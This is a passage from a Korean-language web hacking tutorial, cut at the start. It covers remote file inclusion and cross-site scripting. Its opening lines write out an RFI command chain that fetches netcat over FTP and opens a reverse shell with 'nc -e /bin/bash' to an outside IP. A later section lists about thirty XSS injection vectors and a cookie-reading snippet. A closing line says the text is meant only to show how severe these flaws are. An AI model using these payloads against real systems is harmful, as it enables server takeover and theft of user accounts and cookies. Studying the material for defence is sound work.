http://10.1.1.9/bbs/login.php?file=http://61.240.10.9/test.php?cmd=echo get nc >> /tmp/ftpdown.txt
http://10.1.1.9/bbs/login.php?file=http://61.240.10.9/test.php?cmd=echo quit >> /tmp/ftpdown.txt
http://10.1.1.9/bbs/login.php?file=http://61.240.10.9/test.php?cmd=cd /tmp; ftp -n < /tmp/ftpdown.txt
http://10.1.1.9/bbs/login.php?file=http://61.240.10.9/test.php?cmd=chmod 777 /tmp/nc; /tmp/nc -e /bin/bash 61.240.10.9 8888

- ftp라는 명령은 대부분의 서버에서 실행이 가능하므로 위의 공격은 성공적으로 이루어지지만 웹 서버의 access_log나 error_log에 로그가 많이 남기 때문에 위험이 따른다.


6. Cross-Site Scripting(XSS)



- XSS라고 불리우는 Cross Site Scripting은 공격 대상을 서버에서 개인 사용자로 만드는데 가장 큰 역할을 하였다. 웹 서버는 단지 중간 매개체 역할을 할 뿐이다.

- 공격자들은 웹 어플리케이션을 이용하여 다른 사용자에게 자바 스크립트 같은 악성 코드를 보내고 공격 대상자가 이 코드를 읽었을 때 이 사용자의 정보를 공격자에게 보내지게 된다.

- 공격자는 공격대상자에게 악성코드가 담긴 이메일을 보내거나 특정 사이트의 게시판에 악성코드를 추가하여 게시물을 작성하여 다른 사용자들이 글을 읽기만 하여도 코드가 실행되게 하기도 한다. 심지어는 공격자가 직접 사이트를 구축하기도 한다.

- 이런 공격이 공격자의 의도대로 이루어지게 되면 사용자들의 계정 정보를 하이재킹하여 사용자 정보를 수정하거나 쿠키를 조작하여 개인정보를 수정하기도 한다. 또는 이 공격을 통해 획득된 다른 사용자의 계정을 도용하여 스팸메일을 보내기도 한다. 이런 공격이 이루어지게 하는 코드들로는 JavaScript, VBScript, ActiveX, Flash등이 있다.

- 웹 브라우저에 다음과 같이 입력해 보면.

javascript:document.cookie;

- 아이디와 패스워드 뿐만 아니라 쿠키 정보를 가지고 인증을 하기 때문에 쿠키가 악의적인 사용자의 손에 들어가게 된다면 그 악의적인 사용자는 다른 사용자인 것처럼 접속이 가능해진다.

- XSS 코드는 다음과 같이 사용할 수 있다.

<a href="javascript#[code]">
<div onmouseover="[code]">
<img src="javascript:[code]">
<img dynsrc="javascript:[code]">
<input type="image" dynsrc="javascript:[code]">
<bgsound src="javascript:[code]">
&<script>[code]</script>
&{[code]};
<img src=&{[code]};>
<link rel="stylesheet" href="javascript:[code]">
<iframe src="vbscript:[code]">
<img src="mocha:[code]">
<img src="livescript:[code]">
<a href="about:<script>[code]</script>">
<meta http-equiv="refresh" content="0;url=javascript:[code]">
<body onload="[code]">
<div style="background-image: url(javascript:[code]);">
<div style="behaviour: url([link to code]);">
<div style="binding: url([link to code]);">
<div style="width: expression([code]);">
<style type="text/javascript">[code]</style>
<object classid="clsid:..." codebase="javascript:[code]">
<style><!--</style><script>[code]//--></script>
<![CDATA[<!--]]><script>[code]//--></script>
<!-- -- --><script>[code]</script><!-- -- -->
<<script>[code]</script>
<img src="blah"onmouseover="[code]">
<img src="blah>" onmouseover="[code]">
<xml src="javascript:[code]">
<xml id="X"><a><b><script>[code]</script>;</b></a></xml>
<div datafld="b" dataformatas="html" datasrc="#X"></div>
[\xC0][\xBC]script>[code][\xC0][\xBC]/script>

[경고 : 보안 심각성을 보이기위해 작성된 문서임. 절대 악용하지 말 것!!]